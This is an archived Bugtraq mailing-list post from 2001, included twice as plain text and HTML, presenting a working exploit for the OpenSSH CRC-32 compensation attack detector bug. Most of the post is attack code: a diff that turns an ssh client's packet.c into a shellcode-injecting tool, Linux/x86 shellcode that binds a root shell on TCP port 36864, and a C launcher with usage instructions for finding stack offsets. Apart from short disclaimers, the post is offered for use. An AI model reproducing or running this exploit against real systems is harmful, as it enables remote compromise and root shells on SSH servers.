SSH CRC-32 Compensation Attack Detector Vulnerability Exploit
Date: Wed, 21 Feb 2001 06:38:15 -0000
From: Hugo Dias <bsphere@CLIX.PT>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SSH CRC-32 Compensation Attack Detector Vulnerability Exploit
This is a multi-part message in MIME format.
------=_NextPart_000_0008_01C09BD0.DE9B5AC0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This is the exploit for the bug in file deattack.c in the portable
version of openssh-2.2.0 (and possible below).
We need to know several numbers for it to work so it's very difficult=20
to use the exploit on the wild.
1. We need to know is the EXACT distance of the variable "h" to the 2=20
last bytes of the saved EIP in the stack with an increment of 2 =
bytes.
2. This is the number that we place instead of the two first bytes.
(last two bytes are the first two bytes of the address)
Example : 0x0806d3de =20
We will replace 0x0806 for the address we want, so we will replace
0xde 0xd3 0x06 0x08 for 0xde 0xd3 0x0f 0x08
that is the address of the buffer with the shellcode.
3. Packet Length
4. REAL packet length. The shellcode will go in the difference between =
this
two lengths,as the sshd server reads 8192(?) bytes at time .
Then we need the host and the port number :)=20
Finnaly we kneed a small number that doesn=B4t cause SEG FAULT.
It doesn=B4t matter how large is it as long as it doesn't cause any=20
segment error.
It can be 0,1,2,3,...
Example :
./xp 30988 0 114200 117280 127.0.0.1 22 3
This works on Linux Mandrake 7.2 using "sshd -d" being debugged with =
GDB,
but it's possible to attach a SSHD child with GDB and find the numbers =
we=20
need for this to work with the daemon.If the SSHD child doesn't SEG =
FAULT
in the beggining (we can do that easily by trying a few numbers) it will
take more than 10 seconds to process the packet and that is sufficient =
to
attach the process without changing its code and put a "sleep(15)" in =
it.
We need to be root :) for doing this ...
Finding the numbers we need without being root is very difficult.
And without no access to any user in the system at all its even more =
difficult.
This addresses changes with the plataform,operating system,packet =
length...
BUT its possible to do it (pheraps by reproducing exactly the victim =
environment)
and thats why i wrote this.
So as allways : "Please upgrade your software"
Get the last version of OpenSSH from :=20
http://www.openssh.com
- =
-------------------------------------------------------------------------=
-----------
I used a modified version of the openssh-2.3.0 (portable) SSH to produce =
the packet.
THIS FILES ARE FOR EDUCATIONAL PURPOSE ONLY.
Diff file to modify an ssh client for using it with the exploit :
- =
-------------------------------------------------------------------------=
-----------
- --- packet.c Sat Oct 14 06:23:12 2000
+++ packet.c Tue Feb 20 09:33:00 2001
@@ -68,6 +68,85 @@
#define DBG(x)
#endif
=20
+
+/*
+ * Linux/x86
+ * TCP/36864 portshell (old, could be optimized further)
+ */
+
+char shellcode[] =3D /* anathema <anathema@hack.co.za> */
+/* main: */
+"\xeb\x72" /* jmp callz */
+/* start: */
+"\x5e" /* popl %esi */
+
+ /* socket() */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
+"\x40" /* incl %eax */
+"\x89\xc3" /* movl %eax, %ebx */
+"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
+"\x40" /* incl %eax */
+"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* bind() */
+"\x43" /* incl %ebx */
+"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
+"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
+"\x88\x46\x08" /* movb %al, 0x08(%esi) */
+"\x29\xc0" /* subl %eax, %eax */
+"\x89\xc2" /* movl %eax, %edx */
+"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
+"\xb0\x90" /* movb $0x90, %al */
+"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
+"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
+"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
+"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* listen() */
+"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
+"\x43" /* incl %ebx */
+"\x43" /* incl %ebx */
+"\xb0\x66" /* movb $0x66, %al */
+"\xcd\x80" /* int $0x80 */
+
+ /* accept() */
+"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
+"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
+"\xb0\x66" /* movb $0x66, %al */
+"\x43" /* incl %ebx */
+"\xcd\x80" /* int $0x80 */
+
+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
+"\x86\xc3" /* xchgb %al, %bl */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x29\xc9" /* subl %ecx, %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+"\xb0\x3f" /* movb $0x3f, %al */
+"\x41" /* incl %ecx */
+"\xcd\x80" /* int $0x80 */
+
+ /* execve() */
+"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
+"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
+"\x87\xf3" /* xchgl %esi, %ebx */
+"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
+"\xb0\x0b" /* movb $0x0b, %al */
+"\xcd\x80" /* int $0x80 */
+
+/* callz: */
+"\xe8\x89\xff\xff\xff" /* call start */
+"/bin/sh";
+
+
/*
* This variable contains the file descriptors used for communicating =
with
* the other side. connection_in is used for reading; connection_out =
for
@@ -125,6 +204,9 @@
/* Session key information for Encryption and MAC */
Kex *kex =3D NULL;
=20
+/* Packet Number */
+int count =3D 0;
+
void
packet_set_kex(Kex *k)
{
@@ -461,6 +543,8 @@
unsigned int checksum;
u_int32_t rand =3D 0;
=20
+ count++;
+
/*
* If using packet compression, compress the payload of the outgoing
* packet.
@@ -1172,7 +1256,64 @@
void
packet_write_poll()
{
- - int len =3D buffer_len(&output);
+ int len;
+ char buf[50],*p,*ptr;
+ char code[270000];
+ long sz;
+ FILE *f;=20
+
+ if (count =3D=3D 2)
+ {
+ f =3D fopen("/tmp/code","r");
+ fgets(buf,28,f);=20
+ fclose(f); =20
+
+ sz =3D GET_32BIT(&buf[24]);
+ buffer_clear(&output);
+ buffer_append(&output,code,sz);=20
+=20
+ len =3D buffer_len(&output);
+
+ ptr =3D buffer_ptr(&output);=20
+
+ for(p =3D ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=3D8)
+ {
+ *p=3Dbuf[0];
+ *(p+1)=3Dbuf[1];
+ *(p+2)=3Dbuf[2];
+ *(p+3)=3Dbuf[3];
+ *(p+4)=3Dbuf[4];
+ *(p+5)=3Dbuf[5];
+ *(p+6)=3Dbuf[6];
+ *(p+7)=3Dbuf[7];
+ }
+
+ sz =3D ((GET_32BIT(&buf[20]) + 8) & ~7);
+
+ for(p =3D p ; p < ptr + sz ; p+=3D8)
+ {
+ *p=3Dbuf[8];
+ *(p+1)=3Dbuf[9];
+ *(p+2)=3Dbuf[10];
+ *(p+3)=3Dbuf[11];
+ *(p+4)=3Dbuf[12];
+ *(p+5)=3Dbuf[13];
+ *(p+6)=3Dbuf[14];
+ *(p+7)=3Dbuf[15];
+ }
+
+ sz =3D len - GET_32BIT(&buf[20]);
+=20
+ memset(p,'\x90',sz);
+ memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
+ memcpy(ptr,&buf[20],4);=20
+
+ count++;
+ }
+
+ len =3D buffer_len(&output);
+
+
if (len > 0) {
len =3D write(connection_out, buffer_ptr(&output), len);
if (len <=3D 0) {
@@ -1299,3 +1440,4 @@
max_packet_size =3D s;
return s;
}
+
- =
-------------------------------------------------------------------------=
-----------
/*=20
THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
BlackSphere - Hugo Oliveira Dias
Tue Feb 20 16:18:00 2001
Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere
Exploit code for using the modified ssh
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
int main(int argc,char *argv[])
{
int f;
int port;
unsigned long addr,*ptr;
char *buffer,*aux,ch,*ssh;
int i;
if (argc < 8)
{
printf("\nUsage : %s <saved eip> <count> <packet length> <username =
length> <host> \
<port> <h(i)>\n\n",argv[0]);
=20
fflush(stdout);
_exit(0);
}
port=3Datoi(argv[6]);
buffer =3D (char *) malloc(29);
ptr =3D (unsigned long *) buffer;
*(ptr++) =3D 1543007393 + strtoul(argv[1],0,10);
*(ptr++) =3D 0;
*(ptr++) =3D strtoul(argv[7],0,10);
*(ptr++) =3D 0;
*(ptr++) =3D 16520 + strtoul(argv[2],0,10);
*(ptr++) =3D strtoul(argv[3],0,10);
*(ptr++) =3D strtoul(argv[4],0,10);
buffer[29]=3D0;
for(i =3D 0 ; i < 27 ; i+=3D4)
{
aux =3D buffer + i;
ch=3D*aux;
*aux=3D*(aux+3);
*(aux+3)=3Dch;
ch=3D*(aux+1);
*(aux+1)=3D*(aux+2);
*(aux+2)=3Dch;=20
}=20
printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
fflush(stdout);
=20
f =3D open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
write(f,buffer,28);
close(f);
ssh =3D (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
strcpy(ssh,PATH_SSH);
sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
=20
printf("%s\n",ssh);
system(ssh);
_exit(0);=20
}
- =
-------------------------------------------------------------------------=
-----------
BlackSphere - Hugo Oliveira Dias - 20 Fev 2001
Email: bsphere@clix.pt
Homepage: http://planeta.clix.pt/bsphere
- =
-------------------------------------------------------------------------=
-----------
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOpK/xBmmBmSsB+85EQLAWACgzdeSqpGTpz+TklsupMD5/KUCt6UAn248
J2jw4HBHgb7MHR/vfYqMDY3l
=3DOD22
-----END PGP SIGNATURE-----
------=_NextPart_000_0008_01C09BD0.DE9B5AC0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4134.100" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This is the exploit for the bug in file =
deattack.c=20
in the portable<BR>version of openssh-2.2.0 (and possible =
below).</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>We need to know several numbers for it =
to work so=20
it's very difficult <BR>to use the exploit on the wild.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>1. We need to know is the EXACT =
distance of the=20
variable "h" to the 2 <BR> last bytes of the saved EIP in =
the stack=20
with an increment of 2 bytes.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>2. This is the number that we place =
instead of the=20
two first bytes.<BR> (last two bytes are the first two bytes =
of the=20
address)<BR> Example : 0x0806d3de <BR> We =
will=20
replace 0x0806 for the address we want, so we will replace<BR> 0xde =
0xd3=20
0x06 0x08 for 0xde 0xd3 0x0f 0x08<BR> that is the address of the =
buffer=20
with the shellcode.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>3. Packet Length</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>4. REAL packet length. The shellcode =
will go in the=20
difference between this<BR> two lengths,as the sshd server =
reads=20
8192(?) bytes at time .</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Then we need the host and the port =
number :)=20
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Finnaly we kneed a small number that =
doesn=B4t cause=20
SEG FAULT.<BR>It doesn=B4t matter how large is it as long as it doesn't =
cause any=20
<BR>segment error.<BR>It can be 0,1,2,3,...</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Example :</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>./xp 30988 0 114200 117280 127.0.0.1 22 =
3</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>This works on Linux Mandrake 7.2 using =
"sshd -d"=20
being debugged with GDB,<BR>but it's possible to attach a SSHD child =
with GDB=20
and find the numbers we <BR>need for this to work with the daemon.If the =
SSHD=20
child doesn't SEG FAULT<BR>in the beggining (we can do that easily by =
trying a=20
few numbers) it will<BR>take more than 10 seconds to process the packet =
and that=20
is sufficient to<BR>attach the process without changing its code and put =
a=20
"sleep(15)" in it.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>We need to be root :) for doing this =
...<BR>Finding=20
the numbers we need without being root is very difficult.<BR>And without =
no=20
access to any user in the system at all its even more difficult.<BR>This =
addresses changes with the plataform,operating system,packet=20
length...</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>BUT its possible to do it (pheraps by =
reproducing=20
exactly the victim environment)<BR>and thats why i wrote =
this.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>So as allways : "Please upgrade your=20
software"</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get the last version of OpenSSH from :=20
</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://www.openssh.com">http://www.openssh.com</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial =
size=3D2>
<DIV><BR>-=20
-------------------------------------------------------------------------=
-----------<BR>I=20
used a modified version of the openssh-2.3.0 (portable) SSH to produce =
the=20
packet.</DIV>
<DIV> </DIV>
<DIV>THIS FILES ARE FOR EDUCATIONAL PURPOSE ONLY.</DIV>
<DIV> </DIV>
<DIV>Diff file to modify an ssh client for using it with the exploit =
:<BR>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>- --- packet.c Sat Oct 14 06:23:12 2000<BR>+++ =
packet.c Tue Feb=20
20 09:33:00 2001<BR>@@ -68,6 +68,85 @@<BR> #define=20
DBG(x)<BR> #endif<BR> <BR>+<BR>+/*<BR>+ * Linux/x86<BR>+ =
* =20
TCP/36864 portshell (old, could be optimized further)<BR>+ =
*/<BR>+<BR>+char=20
shellcode[] =3D /* anathema <<A=20
href=3D"mailto:anathema@hack.co.za">anathema@hack.co.za</A>> =
*/<BR>+/* main:=20
*/<BR>+"\xeb\x72" &n=
bsp; &nb=
sp; =20
/* jmp=20
callz &n=
bsp; =20
*/<BR>+/* start:=20
*/<BR>+"\x5e" =
&=
nbsp; &n=
bsp;=20
/* popl=20
%esi &nb=
sp; =20
*/<BR>+<BR>+ /* socket()=20
*/<BR>+"\x29\xc0" &n=
bsp; &nb=
sp; =20
/* subl %eax, %eax =20
*/<BR>+"\x89\x46\x10" &nbs=
p;  =
; =20
/* movl %eax, 0x10(%esi) =20
*/<BR>+"\x40" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%eax &nb=
sp; =20
*/<BR>+"\x89\xc3" &n=
bsp; &nb=
sp; =20
/* movl %eax, %ebx =20
*/<BR>+"\x89\x46\x0c" &nbs=
p;  =
; =20
/* movl %eax, 0x0c(%esi) =20
*/<BR>+"\x40" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%eax &nb=
sp; =20
*/<BR>+"\x89\x46\x08" &nbs=
p;  =
; =20
/* movl %eax, 0x08(%esi) =20
*/<BR>+"\x8d\x4e\x08" &nbs=
p;  =
; =20
/* leal 0x08(%esi), %ecx =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* bind()=20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xc6\x46\x10\x10" =
&=
nbsp; =20
/* movb $0x10, 0x10(%esi) =20
*/<BR>+"\x66\x89\x5e\x14" =
&=
nbsp; =20
/* movw %bx, 0x14(%esi) =20
*/<BR>+"\x88\x46\x08" &nbs=
p;  =
; =20
/* movb %al, 0x08(%esi) =20
*/<BR>+"\x29\xc0" &n=
bsp; &nb=
sp; =20
/* subl %eax, %eax =20
*/<BR>+"\x89\xc2" &n=
bsp; &nb=
sp; =20
/* movl %eax, %edx =20
*/<BR>+"\x89\x46\x18" &nbs=
p;  =
; =20
/* movl %eax, 0x18(%esi) =20
*/<BR>+"\xb0\x90" &n=
bsp; &nb=
sp; =20
/* movb $0x90, %al =20
*/<BR>+"\x66\x89\x46\x16" =
&=
nbsp; =20
/* movw %ax, 0x16(%esi) =20
*/<BR>+"\x8d\x4e\x14" &nbs=
p;  =
; =20
/* leal 0x14(%esi), %ecx =20
*/<BR>+"\x89\x4e\x0c" &nbs=
p;  =
; =20
/* movl %ecx, 0x0c(%esi) =20
*/<BR>+"\x8d\x4e\x08" &nbs=
p;  =
; =20
/* leal 0x08(%esi), %ecx =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* listen()=20
*/<BR>+"\x89\x5e\x0c" &nbs=
p;  =
; =20
/* movl %ebx, 0x0c(%esi) =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* accept()=20
*/<BR>+"\x89\x56\x0c" &nbs=
p;  =
; =20
/* movl %edx, 0x0c(%esi) =20
*/<BR>+"\x89\x56\x10" &nbs=
p;  =
; =20
/* movl %edx, 0x10(%esi) =20
*/<BR>+"\xb0\x66" &n=
bsp; &nb=
sp; =20
/* movb $0x66, %al =20
*/<BR>+"\x43" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ebx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* dup2(s, 0); dup2(s, 1); dup2(s, 2);=20
*/<BR>+"\x86\xc3" &n=
bsp; &nb=
sp; =20
/* xchgb %al, %bl =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x29\xc9" &n=
bsp; &nb=
sp; =20
/* subl %ecx, %ecx =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x41" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ecx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+"\xb0\x3f" &n=
bsp; &nb=
sp; =20
/* movb $0x3f, %al =20
*/<BR>+"\x41" =
&=
nbsp; &n=
bsp;=20
/* incl=20
%ecx &nb=
sp; =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+ /* execve()=20
*/<BR>+"\x88\x56\x07" &nbs=
p;  =
; =20
/* movb %dl, 0x07(%esi) =20
*/<BR>+"\x89\x76\x0c" &nbs=
p;  =
; =20
/* movl %esi, 0x0c(%esi) =20
*/<BR>+"\x87\xf3" &n=
bsp; &nb=
sp; =20
/* xchgl %esi, %ebx =20
*/<BR>+"\x8d\x4b\x0c" &nbs=
p;  =
; =20
/* leal 0x0c(%ebx), %ecx =20
*/<BR>+"\xb0\x0b" &n=
bsp; &nb=
sp; =20
/* movb $0x0b, %al =20
*/<BR>+"\xcd\x80" &n=
bsp; &nb=
sp; =20
/* int=20
$0x80 &n=
bsp; =20
*/<BR>+<BR>+/* callz:=20
*/<BR>+"\xe8\x89\xff\xff\xff" &n=
bsp; =20
/* call=20
start &n=
bsp; =20
*/<BR>+"/bin/sh";<BR>+<BR>+<BR> /*<BR> * This variable =
contains the=20
file descriptors used for communicating with<BR> * the other =
side. =20
connection_in is used for reading; connection_out for<BR>@@ -125,6 =
+204,9=20
@@<BR> /* Session key information for Encryption and MAC=20
*/<BR> Kex *kex =3D NULL;<BR> <BR>+/* Packet Number =
*/<BR>+int=20
count =3D 0;<BR>+<BR> void<BR> packet_set_kex(Kex =
*k)<BR> {<BR>@@=20
-461,6 +543,8 @@<BR> unsigned int =
checksum;<BR> u_int32_t=20
rand =3D =
0;<BR> <BR>+ count++;<BR>+<BR> /*<BR> * =
If using packet compression, compress the payload of the=20
outgoing<BR> * packet.<BR>@@ -1172,7 +1256,64=20
@@<BR> void<BR> packet_write_poll()<BR> {<BR>- - int =
len =3D=20
buffer_len(&output);<BR>+ int len;<BR>+ char=20
buf[50],*p,*ptr;<BR>+ char code[270000];<BR>+ long =
sz;<BR>+ FILE=20
*f; <BR>+<BR>+ if (count =3D=3D 2)<BR>+ {<BR>+ f =
=3D=20
fopen("/tmp/code","r");<BR>+ fgets(buf,28,f); <BR>+ =20
fclose(f); <BR>+<BR>+ sz =3D =
GET_32BIT(&buf[24]);<BR>+ =20
buffer_clear(&output);<BR>+ =
buffer_append(&output,code,sz);=20
<BR>+ <BR>+ len =3D buffer_len(&output);<BR>+<BR>+ =
ptr=20
=3D buffer_ptr(&output); <BR>+<BR>+ for(p =3D ptr + 4 ; p =
< ptr +=20
GET_32BIT(&buf[16]) ; p+=3D8)<BR>+ =20
{<BR>+ *p=3Dbuf[0];<BR>+ *(p+1)=3Dbuf[1];<BR>+ =
; *(p+2)=3Dbuf[2];<BR>+ *(p+3)=3Dbuf[3];<BR>+ =
*(p+4)=3Dbuf[4];<BR>+ *(p+5)=3Dbuf[5];<BR>+ *(p+6)=3D=
buf[6];<BR>+ *(p+7)=3Dbuf[7];<BR>+ =20
}<BR>+<BR>+ sz =3D ((GET_32BIT(&buf[20]) + 8) & =
~7);<BR>+<BR>+ =20
for(p =3D p ; p < ptr + sz ; p+=3D8)<BR>+ =20
{<BR>+ *p=3Dbuf[8];<BR>+ *(p+1)=3Dbuf[9];<BR>+ =
; *(p+2)=3Dbuf[10];<BR>+ *(p+3)=3Dbuf[11];<BR>+ &nbs=
p;*(p+4)=3Dbuf[12];<BR>+ *(p+5)=3Dbuf[13];<BR>+ *(p=
+6)=3Dbuf[14];<BR>+ *(p+7)=3Dbuf[15];<BR>+ =20
}<BR>+<BR>+ sz =3D len - =
GET_32BIT(&buf[20]);<BR>+ <BR>+ =20
memset(p,'\x90',sz);<BR>+ =20
memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));<BR>+&=
nbsp;=20
memcpy(ptr,&buf[20],4); <BR>+<BR>+ =20
count++;<BR>+ }<BR>+<BR>+ len =3D=20
buffer_len(&output);<BR>+<BR>+<BR> if (len > 0)=20
{<BR> len =3D write(connection_out, =
buffer_ptr(&output),=20
len);<BR> if (len <=3D 0) {<BR>@@ -1299,3 +1440,4=20
@@<BR> max_packet_size =3D s;<BR> return=20
s;<BR> }<BR>+</DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>/* </DIV>
<DIV> </DIV>
<DIV>THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.</DIV>
<DIV> </DIV>
<DIV>BlackSphere - Hugo Oliveira Dias<BR>Tue Feb 20 16:18:00 2001</DIV>
<DIV> </DIV>
<DIV>Email: <A =
href=3D"mailto:bsphere@clix.pt">bsphere@clix.pt</A><BR>Homepage: <A=20
href=3D"http://planeta.clix.pt/bsphere">http://planeta.clix.pt/bsphere</A=
></DIV>
<DIV> </DIV>
<DIV>Exploit code for using the modified ssh</DIV>
<DIV> </DIV>
<DIV>*/<BR>#include <stdio.h><BR>#include =
<stdlib.h><BR>#include=20
<unistd.h><BR>#include <sys/types.h><BR>#include=20
<sys/stat.h><BR>#include <fcntl.h></DIV>
<DIV> </DIV>
<DIV>/* Path to modified ssh */<BR>#define PATH_SSH "./ssh"</DIV>
<DIV> </DIV>
<DIV>int main(int argc,char *argv[])<BR>{<BR> int f;<BR> int=20
port;<BR> unsigned long addr,*ptr;<BR> char=20
*buffer,*aux,ch,*ssh;<BR> int i;</DIV>
<DIV> </DIV>
<DIV> if (argc < 8)<BR> {<BR> printf("\nUsage : %s =
<saved=20
eip> <count> <packet length> <username length> =
<host>=20
\<BR><port> <h(i)>\n\n",argv[0]);<BR> <BR> =20
fflush(stdout);<BR> _exit(0);<BR> }</DIV>
<DIV> </DIV>
<DIV> port=3Datoi(argv[6]);</DIV>
<DIV> </DIV>
<DIV> buffer =3D (char *) malloc(29);</DIV>
<DIV> </DIV>
<DIV> ptr =3D (unsigned long *) buffer;</DIV>
<DIV> </DIV>
<DIV> *(ptr++) =3D 1543007393 + =
strtoul(argv[1],0,10);<BR> *(ptr++) =3D=20
0;<BR> *(ptr++) =3D strtoul(argv[7],0,10);<BR> *(ptr++) =3D=20
0;<BR> *(ptr++) =3D 16520 + =
strtoul(argv[2],0,10);<BR> *(ptr++) =3D=20
strtoul(argv[3],0,10);<BR> *(ptr++) =3D =
strtoul(argv[4],0,10);</DIV>
<DIV> </DIV>
<DIV> buffer[29]=3D0;</DIV>
<DIV> </DIV>
<DIV> for(i =3D 0 ; i < 27 ; i+=3D4)<BR> {<BR> aux =
=3D buffer +=20
i;<BR> ch=3D*aux;<BR> *aux=3D*(aux+3);<BR> =
*(aux+3)=3Dch;<BR> =20
ch=3D*(aux+1);<BR> *(aux+1)=3D*(aux+2);<BR> =20
*(aux+2)=3Dch; <BR> } </DIV>
<DIV> </DIV>
<DIV> printf("\nSaved Eip : &h + %u",1543007393 +=20
strtoul(argv[1],0,10));<BR> printf("\nReturn Address :=20
0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);<BR> printf("\nPacket =
Length :=20
%u",(strtoul(argv[3],0,10)+8) & ~7);<BR> printf("\nUsername =
Length :=20
%u\n\n",strtoul(argv[4],0,10));<BR> fflush(stdout);<BR> </DIV>
<DIV> </DIV>
<DIV> f =3D open("/tmp/code",O_RDWR |=20
O_CREAT,S_IRWXU);<BR> write(f,buffer,28);<BR> close(f);</DIV>
<DIV> </DIV>
<DIV> ssh =3D (char *) malloc(strlen(PATH_SSH) + 100 +=20
strlen(argv[5]));</DIV>
<DIV> </DIV>
<DIV> strcpy(ssh,PATH_SSH);</DIV>
<DIV> </DIV>
<DIV> sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root=20
%s",port,argv[5]);<BR> <BR> printf("%s\n",ssh);</DIV>
<DIV> </DIV>
<DIV> system(ssh);</DIV>
<DIV> </DIV>
<DIV> _exit(0); <BR>}</DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------</DIV>
<DIV> </DIV>
<DIV>BlackSphere - Hugo Oliveira Dias - 20 Fev 2001</DIV>
<DIV> </DIV>
<DIV>Email: <A =
href=3D"mailto:bsphere@clix.pt">bsphere@clix.pt</A><BR>Homepage: <A=20
href=3D"http://planeta.clix.pt/bsphere">http://planeta.clix.pt/bsphere</A=
></DIV>
<DIV> </DIV>
<DIV>-=20
-------------------------------------------------------------------------=
-----------<BR>-----BEGIN=20
PGP SIGNATURE-----<BR>Version: PGPfreeware 7.0.3 for non-commercial use =
<<A=20
href=3D"http://www.pgp.com">http://www.pgp.com</A>></DIV>
<DIV> </DIV>
<DIV>iQA/AwUBOpK/xBmmBmSsB+85EQLAWACgzdeSqpGTpz+TklsupMD5/KUCt6UAn248<BR>=
J2jw4HBHgb7MHR/vfYqMDY3l<BR>=3DOD22<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_0008_01C09BD0.DE9B5AC0--